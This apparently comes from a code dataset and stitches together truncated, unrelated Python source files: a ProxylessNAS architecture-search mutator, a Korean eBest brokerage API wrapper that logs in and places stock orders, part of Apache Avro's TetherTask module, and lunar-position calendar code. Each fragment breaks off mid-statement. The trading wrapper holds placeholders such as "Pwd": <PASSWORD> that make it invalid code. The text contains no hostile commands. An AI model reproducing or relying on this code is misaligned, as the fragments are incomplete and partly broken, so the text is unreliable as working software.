<gh_stars>10-100 import math import numpy as np import torch from torch import nn as nn from torch.nn import functional as F from lib.mutables.spaces import OperationSpace from .base_mutator import BaseMutator from .default_mutator import Mutator __all__ = [ 'ProxylessMutator', ] def detach_variable(inputs): """ Detach variables Parameters ---------- inputs : pytorch tensors pytorch tensors """ if isinstance(inputs, tuple): return tuple([detach_variable(x) for x in inputs]) else: x = inputs.detach() x.requires_grad = inputs.requires_grad return x class ArchGradientFunction(torch.autograd.Function): @staticmethod def forward(ctx, x, binary_gates, run_func, backward_func): ctx.run_func = run_func ctx.backward_func = backward_func detached_x = detach_variable(x) with torch.enable_grad(): output = run_func(detached_x) ctx.save_for_backward(detached_x, output) return output.data @staticmethod def backward(ctx, grad_output): detached_x, output = ctx.saved_tensors grad_x = torch.autograd.grad(output, detached_x, grad_output, only_inputs=True) # compute gradients w.r.t. binary_gates binary_grads = ctx.backward_func(detached_x.data, output.data, grad_output.data) return grad_x[0], binary_grads, None, None class MixedOp(nn.Module): """ This class is to instantiate and manage info of one OperationSpace. It includes architecture weights, binary weights, and member functions operating the weights. forward_mode: forward/backward mode for OperationSpace: None, two, full, and full_v2. For training architecture weights, we use full_v2 by default, and for training model weights, we use None. """ forward_mode = None def __init__(self, mutable): """ Parameters ---------- mutable : OperationSpace A OperationSpace in user model """ super(MixedOp, self).__init__() self.ap_path_alpha = nn.Parameter(torch.Tensor(mutable.length)) self.ap_path_wb = nn.Parameter(torch.Tensor(mutable.length)) self.ap_path_alpha.requires_grad = False self.ap_path_wb.requires_grad = False self.active_index = [0] self.inactive_index = None self.log_prob = None self.current_prob_over_ops = None self.n_choices = mutable.length def get_ap_path_alpha(self): return self.ap_path_alpha def to_requires_grad(self): self.ap_path_alpha.requires_grad = True self.ap_path_wb.requires_grad = True def to_disable_grad(self): self.ap_path_alpha.requires_grad = False self.ap_path_wb.requires_grad = False def forward(self, mutable, x): """ Define forward of OperationSpace. For 'full_v2', backward is also defined. The 'two' mode is explained in section 3.2.1 in the paper. The 'full_v2' mode is explained in Appendix D in the paper. Parameters ---------- mutable : OperationSpace this layer's mutable x : tensor inputs of this layer, only support one input Returns ------- output: tensor output of this layer """ if MixedOp.forward_mode == 'full' or MixedOp.forward_mode == 'two': output = 0 for _i in self.active_index: oi = self.candidate_ops[_i](x) output = output + self.ap_path_wb[_i] * oi for _i in self.inactive_index: oi = self.candidate_ops[_i](x) output = output + self.ap_path_wb[_i] * oi.detach() elif MixedOp.forward_mode == 'full_v2': def run_function(key, candidate_ops, active_id): def forward(_x): return candidate_ops[active_id](_x) return forward def backward_function(key, candidate_ops, active_id, binary_gates): def backward(_x, _output, grad_output): binary_grads = torch.zeros_like(binary_gates.data) with torch.no_grad(): for k in range(len(candidate_ops)): if k != active_id: out_k = candidate_ops[k](_x.data) else: out_k = _output.data grad_k = torch.sum(out_k * grad_output) binary_grads[k] = grad_k return binary_grads return backward output = ArchGradientFunction.apply( x, self.ap_path_wb, run_function(mutable.key, mutable.candidates, self.active_index[0]), backward_function(mutable.key, mutable.candidates, self.active_index[0], self.ap_path_wb)) else: output = self.active_op(mutable)(x) return output @property def probs_over_ops(self): """ Apply softmax on alpha to generate probability distribution Returns ------- pytorch tensor probability distribution """ probs = F.softmax(self.ap_path_alpha, dim=0) # softmax to probability return probs @property def chosen_index(self): """ choose the op with max prob Returns ------- int index of the chosen one numpy.float32 prob of the chosen one """ probs = self.probs_over_ops.data.cpu().numpy() index = int(np.argmax(probs)) return index, probs[index] def active_op(self, mutable): """ assume only one path is active Returns ------- PyTorch module the chosen operation """ return mutable.candidates[self.active_index[0]] @property def active_op_index(self): """ return active op's index, the active op is sampled Returns ------- int index of the active op """ return self.active_index[0] def set_chosen_op_active(self): """ set chosen index, active and inactive indexes """ chosen_idx, _ = self.chosen_index self.active_index = [chosen_idx] self.inactive_index = [_i for _i in range(0, chosen_idx)] + \ [_i for _i in range(chosen_idx + 1, self.n_choices)] def binarize(self, mutable): """ Sample based on alpha, and set binary weights accordingly. ap_path_wb is set in this function, which is called binarize. Parameters ---------- mutable : OperationSpace this layer's mutable """ self.log_prob = None # reset binary gates self.ap_path_wb.data.zero_() probs = self.probs_over_ops if MixedOp.forward_mode == 'two': # sample two ops according to probs sample_op = torch.multinomial(probs.data, 2, replacement=False) probs_slice = F.softmax(torch.stack([ self.ap_path_alpha[idx] for idx in sample_op ]), dim=0) self.current_prob_over_ops = torch.zeros_like(probs) for i, idx in enumerate(sample_op): self.current_prob_over_ops[idx] = probs_slice[i] # choose one to be active and the other to be inactive according to probs_slice c = torch.multinomial(probs_slice.data, 1)[0] # 0 or 1 active_op = sample_op[c].item() inactive_op = sample_op[1-c].item() self.active_index = [active_op] self.inactive_index = [inactive_op] # set binary gate self.ap_path_wb.data[active_op] = 1.0 else: sample = torch.multinomial(probs, 1)[0].item() self.active_index = [sample] self.inactive_index = [_i for _i in range(0, sample)] + \ [_i for _i in range(sample + 1, len(mutable.candidates))] self.log_prob = torch.log(probs[sample]) self.current_prob_over_ops = probs self.ap_path_wb.data[sample] = 1.0 # avoid over-regularization for choice in mutable.candidates: for _, param in choice.named_parameters(): param.grad = None @staticmethod def delta_ij(i, j): if i == j: return 1 else: return 0 def set_arch_param_grad(self, mutable): """ Calculate alpha gradient for this OperationSpace. It is calculated using gradient of binary gate, probs of ops. """ binary_grads = self.ap_path_wb.grad.data if self.active_op(mutable).is_zero_layer(): self.ap_path_alpha.grad = None return if self.ap_path_alpha.grad is None: self.ap_path_alpha.grad = torch.zeros_like(self.ap_path_alpha.data) if MixedOp.forward_mode == 'two': involved_idx = self.active_index + self.inactive_index probs_slice = F.softmax(torch.stack([ self.ap_path_alpha[idx] for idx in involved_idx ]), dim=0).data for i in range(2): for j in range(2): origin_i = involved_idx[i] origin_j = involved_idx[j] self.ap_path_alpha.grad.data[origin_i] += \ binary_grads[origin_j] * probs_slice[j] * (MixedOp.delta_ij(i, j) - probs_slice[i]) for _i, idx in enumerate(self.active_index): self.active_index[_i] = (idx, self.ap_path_alpha.data[idx].item()) for _i, idx in enumerate(self.inactive_index): self.inactive_index[_i] = (idx, self.ap_path_alpha.data[idx].item()) else: probs = self.probs_over_ops.data for i in range(self.n_choices): for j in range(self.n_choices): self.ap_path_alpha.grad.data[i] += binary_grads[j] * probs[j] * (MixedOp.delta_ij(i, j) - probs[i]) return def rescale_updated_arch_param(self): """ rescale architecture weights for the 'two' mode. """ if not isinstance(self.active_index[0], tuple): assert self.active_op.is_zero_layer() return involved_idx = [idx for idx, _ in (self.active_index + self.inactive_index)] old_alphas = [alpha for _, alpha in (self.active_index + self.inactive_index)] new_alphas = [self.ap_path_alpha.data[idx] for idx in involved_idx] offset = math.log( sum([math.exp(alpha) for alpha in new_alphas]) / sum([math.exp(alpha) for alpha in old_alphas]) ) for idx in involved_idx: self.ap_path_alpha.data[idx] -= offset class ProxylessMutator(Mutator): """ This mutator initializes and operates all the LayerChoices of the input model. It is for the corresponding trainer to control the training process of LayerChoices, coordinating with whole training process. """ def __init__(self, model): """ Init a MixedOp instance for each mutable i.e., OperationSpace. And register the instantiated MixedOp in corresponding OperationSpace. If does not register it in OperationSpace, DataParallel does not work then, because architecture weights are not included in the DataParallel model. When MixedOPs are registered, we use ```requires_grad``` to control whether calculate gradients of architecture weights. Parameters ---------- model : pytorch model The model that users want to tune, it includes search space defined with nas apis """ super(ProxylessMutator, self).__init__(model) self._unused_modules = None self.mutable_list = [] for mutable in self.undedup_mutables: self.mutable_list.append(mutable) mutable.registered_module = MixedOp(mutable) def on_forward_operation_space(self, mutable, *args, **kwargs): """ Callback of layer choice forward. This function defines the forward logic of the input mutable. So mutable is only interface, its real implementation is defined in mutator. Parameters ---------- mutable: OperationSpace forward logic of this input mutable args: list of torch.Tensor inputs of this mutable kwargs: dict inputs of this mutable Returns ------- torch.Tensor output of this mutable, i.e., OperationSpace int index of the chosen op """ # FIXME: return mask, to be consistent with other algorithms idx = mutable.registered_module.active_op_index return mutable.registered_module(mutable, *args, **kwargs), idx def reset_binary_gates(self): """ For each OperationSpace, binarize binary weights based on alpha to only activate one op. It traverses all the mutables in the model to do this. """ for mutable in self.undedup_mutables: mutable.registered_module.binarize(mutable) def set_chosen_op_active(self): """ For each OperationSpace, set the op with highest alpha as the chosen op. Usually used for validation. """ for mutable in self.undedup_mutables: mutable.registered_module.set_chosen_op_active() def num_arch_params(self): """ The number of mutables, i.e., OperationSpace Returns ------- int the number of OperationSpace in user model """ return len(self.mutable_list) def set_arch_param_grad(self): """ For each OperationSpace, calculate gradients for architecture weights, i.e., alpha """ for mutable in self.undedup_mutables: mutable.registered_module.set_arch_param_grad(mutable) def get_architecture_parameters(self): """ Get all the architecture parameters. yield ----- PyTorch Parameter Return ap_path_alpha of the traversed mutable """ for mutable in self.undedup_mutables: yield mutable.registered_module.get_ap_path_alpha() def change_forward_mode(self, mode): """ Update
<reponame>hopelife/mstb import os, sys import configparser import win32com.client import pythoncom from datetime import datetime import time class XASession: #로그인 상태를 확인하기 위한 클래스변수 login_state = 0 def OnLogin(self, code, msg): """ 로그인 시도 후 호출되는 이벤트. code가 0000이면 로그인 성공 """ if code == "0000": print(code, msg) XASession.login_state = 1 else: print(code, msg) def OnDisconnect(self): """ 서버와 연결이 끊어지면 발생하는 이벤트 """ print("Session disconntected") XASession.login_state = 0 class XAQuery: # RES_PATH ="C:\\eBEST\\xingAPI\\Res\\" config = configparser.ConfigParser() config.read(os.path.join(os.path.dirname(__file__), 'conf', 'config.ini')) RES_PATH = config['PATH']['ebest_res'] tr_run_state = 0 def OnReceiveData(self, code): print("OnReceiveData", code) XAQuery.tr_run_state = 1 def OnReceiveMessage(self, error, code, message): print("OnReceiveMessage", error, code, message, XAQuery.tr_run_state) class EBest: QUERY_LIMIT_10MIN = 200 LIMIT_SECONDS = 600 #10min def __init__(self, mode=None): """ config.ini 파일을 로드해 사용자, 서버정보 저장 query_cnt는 10분당 200개 TR 수행을 관리하기 위한 리스트 xa_session_client는 XASession 객체 :param mode:str - 모의서버는 DEMO 실서버는 PROD로 구분 """ if mode not in ["PROD", "DEMO", "ACE"]: raise Exception("Need to run_mode(PROD or DEMO or ACE)") run_mode = "EBEST_" + mode # config = configparser.ConfigParser() config = configparser.RawConfigParser() config.read(os.path.join(os.path.dirname(__file__), 'conf', 'config.ini')) self.user = config[run_mode]['user'] self.passwd = config[run_mode]['password'] self.cert_passwd = config[run_mode]['cert_passwd'] self.host = config[run_mode]['host'] self.port = config[run_mode]['port'] self.account = config[run_mode]['account'] self.xa_session_client = win32com.client.DispatchWithEvents("XA_Session.XASession", XASession) self.query_cnt = [] def login(self): self.xa_session_client.ConnectServer(self.host, self.port) self.xa_session_client.Login(self.user, self.passwd, self.cert_passwd, 0, 0) while XASession.login_state == 0: pythoncom.PumpWaitingMessages() def logout(self): XASession.login_state = 0 self.xa_session_client.DisconnectServer() def _execute_query(self, res, in_block_name, out_block_name, *out_fields, **set_fields): """TR코드를 실행하기 위한 메소드입니다. :param res:str 리소스명(TR) :param in_block_name:str 인블록명 :param out_blcok_name:str 아웃블록명 :param out_params:list 출력필드 리스트 :param in_params:dict 인블록에 설정할 필드 딕셔너리 :return result:list 결과를 list에 담아 반환 """ time.sleep(1) print("current query cnt:", len(self.query_cnt)) print(res, in_block_name, out_block_name) while len(self.query_cnt) >= EBest.QUERY_LIMIT_10MIN: time.sleep(1) print("waiting for execute query... current query cnt:", len(self.query_cnt)) self.query_cnt = list(filter(lambda x: (datetime.today() - x).total_seconds() < EBest.LIMIT_SECONDS, self.query_cnt)) xa_query = win32com.client.DispatchWithEvents("XA_DataSet.XAQuery", XAQuery) xa_query.LoadFromResFile(XAQuery.RES_PATH + res+".res") #in_block_name 셋팅 for key, value in set_fields.items(): xa_query.SetFieldData(in_block_name, key, 0, value) errorCode = xa_query.Request(0) #요청 후 대기 waiting_cnt = 0 while xa_query.tr_run_state == 0: waiting_cnt +=1 if waiting_cnt % 1000000 == 0 : print("Waiting....", self.xa_session_client.GetLastError()) pythoncom.PumpWaitingMessages() #결과블럭 result = [] count = xa_query.GetBlockCount(out_block_name) for i in range(count): item = {} for field in out_fields: value = xa_query.GetFieldData(out_block_name, field, i) item[field] = value result.append(item) """ print("IsNext?", xa_query.IsNext) while xa_query.IsNext == True: time.sleep(1) errorCode = xa_query.Request(1) print("errorCode", errorCode) if errorCode < 0: break count = xa_query.GetBlockCount(out_block_name) print("count", count) if count == 0: break for i in range(count): item = {} for field in out_fields: value = xa_query.GetFieldData(out_block_name, field, i) item[field] = value print(item) result.append(item) """ XAQuery.tr_run_state = 0 self.query_cnt.append(datetime.today()) #영문필드를 한글필드명으로 변환 for item in result: for field in list(item.keys()): if getattr(Field, res, None): res_field = getattr(Field, res, None) if out_block_name in res_field: field_hname = res_field[out_block_name] if field in field_hname: item[field_hname[field]] = item[field] item.pop(field) return result def get_code_list(self, market=None): """TR: t8436 코스피, 코스닥의 종목 리스트를 가져온다 :param market:str 전체(0), 코스피(1), 코스닥(2) :return result:list 시장 별 종목 리스트 """ if market not in ["ALL", "KOSPI", "KOSDAQ"]: raise Exception("Need to market param(ALL, KOSPI, KOSDAQ)") market_code = {"ALL":"0", "KOSPI":"1", "KOSDAQ":"2"} in_params = {"gubun":market_code[market]} out_params =['hname', 'shcode', 'expcode', 'etfgubun', 'memedan', 'gubun', 'spac_gubun'] result = self._execute_query("t8436", "t8436InBlock", "t8436OutBlock", *out_params, **in_params) return result def get_stock_price_by_code(self, code=None, cnt="1"): """TR: t1305 현재 날짜를 기준으로 cnt 만큼 전일의 데이터를 가져온다 :param code:str 종목코드 :param cnt:str 데이터 범위 :return result:list 종목의 최근 가격 정보 """ tr_code = "t1305" in_params = {"shcode":code, "dwmcode": "1", "date":"", "idx":"", "cnt":cnt} out_params =['date', 'open', 'high', 'low', 'close', 'sign', 'change', 'diff', 'volume', 'diff_vol', 'chdegree', 'sojinrate', 'changerate', 'fpvolume', 'covolume', 'value', 'ppvolume', 'o_sign', 'o_change', 'o_diff', 'h_sign', 'h_change', 'h_diff', 'l_sign', 'l_change', 'l_diff', 'marketcap'] #t8413 #in_params = {"shcode":code, "qrycnt": "1", "gubun":"2", "sdate":start, "cts_date":"", "edate":end, "comp_yn":"N"} #out_params =['date', 'open', 'high', 'low', 'close', 'jdiff_vol', 'sign'] result = self._execute_query("t1305", "t1305InBlock", "t1305OutBlock1", *out_params, **in_params) for item in result: item["code"] = code return result def get_credit_trend_by_code(self, code=None, date=None): """TR: t1921 신용거래동향 :param code:str 종목코드 :param date:str 날짜 8자리 ex) 20190222 """ in_params = {"gubun":"0", "shcode":code, "date":date, "idx":"0"} out_params =["mmdate", "close", "sign", "jchange", "diff", "nvolume", "svolume", "jvolume", "price", "change", "gyrate", "jkrate" "shcode"] result = self._execute_query("t1921", "t1921InBlock", "t1921OutBlock1", *out_params, **in_params) for item in result: item["code"] = code return result def get_agent_trend_by_code(self, code=None ,fromdt=None, todt=None): """TR: t1717 외인기관별 종목별 동향 :param code:str 종목코드 :param fromdt:str 조회 시작 날짜 :param todt:str 조회 종료 날짜 :return result:list 시장 별 종목 리스트 """ in_params = {"gubun":"0", "fromdt":fromdt, "todt":todt, "shcode":code} out_params =["date", "close", "sign", "change", "diff", "volume", "tjj0000_vol", "tjj0001_vol", "tjj0002_vol", "tjj0003_vol", "tjj0004_vol", "tjj0005_vol","tjj0006_vol", "tjj0007_vol", "tjj0008_vol", "tjj0009_vol", "tjj0010_vol", "tjj0011_vol", "tjj0018_vol", "tjj0016_vol", "tjj0017_vol", "tjj0001_dan", "tjj0002_dan", "tjj0003_dan", "tjj0004_dan", "tjj0005_dan", "tjj0006_dan", "tjj0007_dan", "tjj0008_dan", "tjj0009_dan", "tjj0010_dan", "tjj0011_dan", "tjj0018_dan", "tjj0016_dan", "tjj0017_dan" ] result = self._execute_query("t1717", "t1717InBlock", "t1717OutBlock", *out_params, **in_params) for item in result: item["code"] = code return result def get_short_trend_by_code(self, code=None, sdate=None, edate=None): """TR: t1927 공매도일별추이 :param code:str 종목코드 :param sdate:str 시작일자 :param edate:str 종료일자 :return result:list 시장 별 종목 리스트 """ in_params = {"date":sdate, "sdate":sdate, "edate":edate, "shcode":code} out_params =["date", "price", "sign", "change", "diff", "volume", "value", "gm_vo", "gm_va", "gm_per", "gm_avg", "gm_vo_sum"] result = self._execute_query("t1927", "t1927InBlock", "t1927OutBlock1", *out_params, **in_params) for item in result: item["code"] = code return result def get_account_info(self): """TR: CSPAQ12200 현물계좌 예수금/주문가능금액/총평가 :return result:list Field CSPAQ12200 참고 """ in_params = {"RecCnt":"1", "AcntNo": self.account, "Pwd": <PASSWORD>} out_params =["MnyOrdAbleAmt", "BalEvalAmt", "DpsastTotamt", "InvstOrgAmt", "InvstPlAmt", "Dps"] result = self._execute_query("CSPAQ12200", "CSPAQ12200InBlock1", "CSPAQ12200OutBlock2", *out_params, **in_params) return result def get_account_stock_info(self): """TR: CSPAQ12300 현물계좌 잔고내역 조회 :return result:list 계좌 보유 종목 정보 """ in_params = {"RecCnt": "1", "AcntNo": self.account, "Pwd": <PASSWORD>, "BalCreTp": "0", "CmsnAppTpCode": "0", "D2balBaseQryTp": "0", "UprcTpCode": "0"} out_params =["IsuNo", "IsuNm", "BnsBaseBalQty", "SellPrc", "BuyPrc", "NowPrc", "AvrUprc", "PnlRat", "BalEvalAmt"] result = self._execute_query("CSPAQ12300", "CSPAQ12300InBlock1", "CSPAQ12300OutBlock3", *out_params, **in_params) def order_stock(self, code, qty, price, bns_type, order_type="00"): """TR: CSPAT00600 현물 정상 주문 :param bns_type:str 매매타입, 1:매도, 2:매수 :prarm order_type:str 호가유형, 00:지정가, 03:시장가, 05:조건부지정가, 07:최우선지정가 61:장개시전시간외 종가, 81:시간외종가, 82:시간외단일가 :return result:dict 주문 관련정보 """ in_params = {"AcntNo":self.account, "InptPwd":<PASSWORD>, "IsuNo":code, "OrdQty":qty, "OrdPrc":price, "BnsTpCode":bns_type, "OrdprcPtnCode":order_type, "MgntrnCode":"000", "LoanDt":"", "OrdCndiTpCode":"0"} out_params = ["OrdNo", "OrdTime", "OrdMktCode", "OrdPtnCode", "ShtnIsuNo", "MgempNo", "OrdAmt", "SpotOrdQty", "IsuNm"] result = self._execute_query("CSPAT00600", "CSPAT00600InBlock1", "CSPAT00600OutBlock2", *out_params, **in_params) return result def order_cancel(self, order_no, code, qty): """TR: CSPAT00800 현물 취소주문 :param order_no:str 주문번호 :param code:str 종목코드 :param qty:str 취소 수량 :return result:dict 취소 결과 """ in_params = {"OrgOrdNo":order_no,"AcntNo":self.account, "InptPwd":self.passwd, "IsuNo":code, "OrdQty":qty} out_params = ["OrdNo", "PrntOrdNo", "OrdTime", "OrdPtnCode", "ShtnIsuNo", "IsuNm"] result = self._execute_query("CSPAT00800", "CSPAT00800InBlock1", "CSPAT00800OutBlock2", *out_params, **in_params) return result def order_check(self, order_no=None): """TR: t0425 주식 체결/미체결 :param code:str 종목코드 :param order_no:str 주문번호 :return result:dict 주문번호의 체결상태 """ in_params = {"accno": self.account, "passwd": <PASSWORD>, "expcode": "", "chegb":"0", "medosu":"0", "sortgb":"1", "cts_ordno":" "} out_params = ["ordno", "expcode", "medosu", "qty", "price", "cheqty", "cheprice", "ordrem", "cfmqty", "status", "orgordno", "ordgb", "ordermtd", "sysprocseq", "hogagb", "price1", "orggb", "singb", "loandt"] result_list = self._execute_query("t0425", "t0425InBlock", "t0425OutBlock1", *out_params, **in_params) result = {} if order_no is not None: for item in result_list: if item["주문번호"] == order_no: result = item return result else: return result_list def order_check2(self, date, code, order_no=None): #CSPAQ13700 print("get_order_check, ", order_no) in_params = {"RecCnt":"1", "AcntNo":self.account, "InptPwd":<PASSWORD>.passwd, "OrdMktCode":"00", "BnsTpCode":"0", "IsuNo":code, "ExecYn":"0", "OrdDt":date, "SrtOrdNo2":"0", "BkseqTpCode":"0", "OrdPtnCode":"00"} out_params_3 = ["OrdDt", "OrdMktCode", "OrdNo", "OrgOrdNo", "IsuNo", "IsuNm", "BnsTpCode", "BnsTpNm", "OrdPtnCode", "OrdPtnNm", "MrcTpCode", "OrdQty", "OrdPrc", "ExecQty", "ExecPrc", "LastExecTime", "OrdprcPtnCode", "OrdprcPtnNm", "AllExecQty", "OrdTime"] result_list = self._execute_query("CSPAQ13700", "CSPAQ13700InBlock1", "CSPAQ13700OutBlock3", *out_params_3, **in_params) result = {} print("get_order_check result len", len(result_list)) if order_no is not None: for item in result_list: if item["주문번호"] == order_no: result = item return result else: return result_list def get_current_call_price_by_code(self, code=None): """TR: t1101 주식 현재가 호가 조회 :param code:str 종목코드 """ tr_code = "t1101" in_params = {"shcode": code} out_params =["hname", "price", "sign", "change", "diff", "volume", "jnilclose", "offerho1","bidho1", "offerrem1", "bidrem1", "offerho2","bidho2", "offerrem2", "bidrem2", "offerho3","bidho3", "offerrem3", "bidrem3", "offerho4","bidho4", "offerrem4", "bidrem4", "offerho5","bidho5", "offerrem5", "bidrem5", "offerho6","bidho6", "offerrem6", "bidrem6", "offerho7","bidho7", "offerrem7", "bidrem7", "offerho8","bidho8", "offerrem8", "bidrem8", "offerho9","bidho9", "offerrem9", "bidrem9", "offerho10","bidho10", "offerrem10", "bidrem10", "preoffercha10", "prebidcha10", "offer", "bid", "preoffercha", "prebidcha", "hotime", "yeprice", "yevolume", "yesign", "yechange", "yediff", "tmoffer", "tmbid", "ho_status", "shcode", "uplmtprice", "dnlmtprice", "open", "high", "low"] result = self._execute_query("t1101", "t1101InBlock", "t1101OutBlock", *out_params, **in_params) for item in result: item["code"] =
#!/usr/bin/env python3 # -*- mode: python -*- # -*- coding: utf-8 -*- ## # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import abc import collections import io import logging import os import sys import threading import traceback import avro.errors import avro.io import avro.ipc import avro.protocol import avro.schema __all__ = ["TetherTask", "TaskType", "inputProtocol", "outputProtocol", "HTTPRequestor"] # create protocol objects for the input and output protocols # The build process should copy InputProtocol.avpr and OutputProtocol.avpr # into the same directory as this module TaskType = None pfile = os.path.split(__file__)[0] + os.sep + "InputProtocol.avpr" with open(pfile, 'r') as hf: prototxt = hf.read() inputProtocol = avro.protocol.parse(prototxt) # use a named tuple to represent the tasktype enumeration taskschema = inputProtocol.types_dict["TaskType"] # Mypy cannot statically type check a dynamically constructed named tuple. # Since InputProtocol.avpr is hard-coded here, we can hard-code the symbols. _ttype = collections.namedtuple("_ttype", ("MAP", "REDUCE")) TaskType = _ttype(*taskschema.symbols) pfile = os.path.split(__file__)[0] + os.sep + "OutputProtocol.avpr" with open(pfile, 'r') as hf: prototxt = hf.read() outputProtocol = avro.protocol.parse(prototxt) class Collector: """ Collector for map and reduce output values """ def __init__(self, scheme, outputClient): """ Parameters --------------------------------------------- scheme - The scheme for the datums to output - can be a json string - or an instance of Schema outputClient - The output client used to send messages to the parent """ if not isinstance(scheme, avro.schema.Schema): scheme = avro.schema.parse(scheme) self.scheme = scheme self.datum_writer = avro.io.DatumWriter(writers_schema=self.scheme) self.outputClient = outputClient def collect(self, record, partition=None): """Collect a map or reduce output value Parameters ------------------------------------------------------ record - The record to write partition - Indicates the partition for a pre-partitioned map output - currently not supported """ # Replace the encoder and buffer every time we collect. with io.BytesIO() as buff: self.encoder = avro.io.BinaryEncoder(buff) self.datum_writer.write(record, self.encoder) value = buff.getvalue() datum = {"datum": value} if partition is not None: datum["partition"] = partition self.outputClient.request("output", datum) def keys_are_equal(rec1, rec2, fkeys): """Check if the "keys" in two records are equal. The key fields are all fields for which order isn't marked ignore. Parameters ------------------------------------------------------------------------- rec1 - The first record rec2 - The second record fkeys - A list of the fields to compare """ for f in fkeys: if not(rec1[f] == rec2[f]): return False return True class HTTPRequestor: """ This is a small requestor subclass I created for the HTTP protocol. Since the HTTP protocol isn't persistent, we need to instantiate a new transciever and new requestor for each request. But I wanted to use of the requestor to be identical to that for SocketTransciever so that we can seamlessly switch between the two. """ def __init__(self, server, port, protocol): """ Instantiate the class. Parameters ---------------------------------------------------------------------- server - The server hostname port - Which port to use protocol - The protocol for the communication """ self.server = server self.port = port self.protocol = protocol def request(self, *args, **param): transciever = avro.ipc.HTTPTransceiver(self.server, self.port) requestor = avro.ipc.Requestor(self.protocol, transciever) return requestor.request(*args, **param) class TetherTask(abc.ABC): """ Base class for python tether mapreduce programs. ToDo: Currently the subclass has to implement both reduce and reduceFlush. This is not very pythonic. A pythonic way to implement the reducer would be to pass the reducer a generator (as dumbo does) so that the user could iterate over the records for the given key. How would we do this. I think we would need to have two threads, one thread would run the user's reduce function. This loop would be suspended when no reducer records were available. The other thread would read in the records for the reducer. This thread should only buffer so many records at a time (i.e if the buffer is full, self.input shouldn't return right away but wait for space to free up) """ def __init__(self, inschema, midschema, outschema): """ Parameters --------------------------------------------------------- inschema - The scheme for the input to the mapper midschema - The scheme for the output of the mapper outschema - The scheme for the output of the reducer An example scheme for the prototypical word count example would be inscheme='{"type":"record", "name":"Pair","namespace":"org.apache.avro.mapred","fields":[ {"name":"key","type":"string"}, {"name":"value","type":"long","order":"ignore"}] }' Important: The records are split into (key,value) pairs as required by map reduce by using all fields with "order"=ignore for the key and the remaining fields for the value. The subclass provides these schemas in order to tell this class which schemas it expects. The configure request will also provide the schemas that the parent process is using. This allows us to check whether the schemas match and if not whether we can resolve the differences (see https://avro.apache.org/docs/current/spec.html#Schema+Resolution)) """ # make sure we can parse the schemas # Should we call fail if we can't parse the schemas? self.inschema = avro.schema.parse(inschema) self.midschema = avro.schema.parse(midschema) self.outschema = avro.schema.parse(outschema) # declare various variables self.clienTransciever = None # output client is used to communicate with the parent process # in particular to transmit the outputs of the mapper and reducer self.outputClient = None # collectors for the output of the mapper and reducer self.midCollector = None self.outCollector = None self._partitions = None # cache a list of the fields used by the reducer as the keys # we need the fields to decide when we have finished processing all values for # a given key. We cache the fields to be more efficient self._red_fkeys = None # We need to keep track of the previous record fed to the reducer # b\c we need to be able to determine when we start processing a new group # in the reducer self.midRecord = None # create an event object to signal when # http server is ready to be shutdown self.ready_for_shutdown = threading.Event() self.log = logging.getLogger("TetherTask") def open(self, inputport, clientPort=None): """Open the output client - i.e the connection to the parent process Parameters --------------------------------------------------------------- inputport - This is the port that the subprocess is listening on. i.e the subprocess starts a server listening on this port to accept requests from the parent process clientPort - The port on which the server in the parent process is listening - If this is None we look for the environment variable AVRO_TETHER_OUTPUT_PORT - This is mainly provided for debugging purposes. In practice we want to use the environment variable """ # Open the connection to the parent process # The port the parent process is listening on is set in the environment # variable AVRO_TETHER_OUTPUT_PORT # open output client, connecting to parent clientPort = int(clientPort or os.getenv("AVRO_TETHER_OUTPUT_PORT", 0)) if clientPort == 0: raise avro.errors.UsageError("AVRO_TETHER_OUTPUT_PORT env var is not set") self.log.info("TetherTask.open: Opening connection to parent server on port={0}".format(clientPort)) # self.outputClient = avro.ipc.Requestor(outputProtocol, self.clientTransceiver) # since HTTP is stateless, a new transciever # is created and closed for each request. We therefore set clientTransciever to None # We still declare clientTransciever because for other (state) protocols we will need # it and we want to check when we get the message fail whether the transciever # needs to be closed. # self.clientTranciever=None self.outputClient = HTTPRequestor("127.0.0.1", clientPort, outputProtocol) try: self.outputClient.request('configure', {"port": inputport}) except Exception: estr = traceback.format_exc() self.fail(estr) def configure(self, taskType, inSchemaText, outSchemaText): """ Parameters ------------------------------------------------------------------- taskType - What type of task (e.g map, reduce) - This is an enumeration which is specified in the input protocol inSchemaText - string containing the input schema - This is the actual schema with which the data was encoded i.e it is the writer_schema (see https://avro.apache.org/docs/current/spec.html#Schema+Resolution) This is the schema the parent process is using which might be
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, -2, 2, 0, 2, 0, 0, 0, 0, 0, 0, -2, 0, 0, 0, 0, -2, -2, 0, 0, 0, 0, 0, 0, 0, -2] cosine_coefficients = \ [-20905355, -3699111, -2955968, -569925, 48888, -3149, 246158, -152138, -170733, -204586, -129620, 108743, 104755, 10321, 0, 79661, -34782, -23210, -21636, 24208, 30824, -8379, -16675, -12831, -10445, -11650, 14403, -7003, 0, 10056, 6322, -9884, 5751, 0, -4950, 4130, 0, -3958, 0, 3258, 2616, -1897, -2117, 2354, 0, 0, -1423, -1117, -1571, -1739, 0, -4421, 0, 0, 0, 0, 1165, 0, 0, 8752] correction = sigma ([cosine_coefficients, args_lunar_elongation, args_solar_anomaly, args_lunar_anomaly, args_moon_node], lambda v, w, x, y, z: (v * pow(cap_E, abs(x)) * cosine_degrees((w * cap_D) + (x * cap_M) + (y * cap_M_prime) + (z * cap_F)))) return mt(385000560) + correction def lunar_position(tee): """Return the moon position (geocentric latitude and longitude [in degrees] and distance [in meters]) at moment, tee. Adapted from "Astronomical Algorithms" by <NAME>, Willmann_Bell, Inc., 2nd ed.""" return (lunar_latitude(tee), lunar_longitude(tee), lunar_distance(tee)) # see lines 3815-3824 in calendrica-3.0.cl def lunar_parallax(tee, location): """Return the parallax of moon at moment, tee, at location, location. Adapted from "Astronomical Algorithms" by <NAME>, Willmann_Bell, Inc., 1998.""" geo = lunar_altitude(tee, location) Delta = lunar_distance(tee) alt = mt(6378140) / Delta arg = alt * cosine_degrees(geo) return arcsin_degrees(arg) # see lines 3826-3832 in calendrica-3.0.cl def 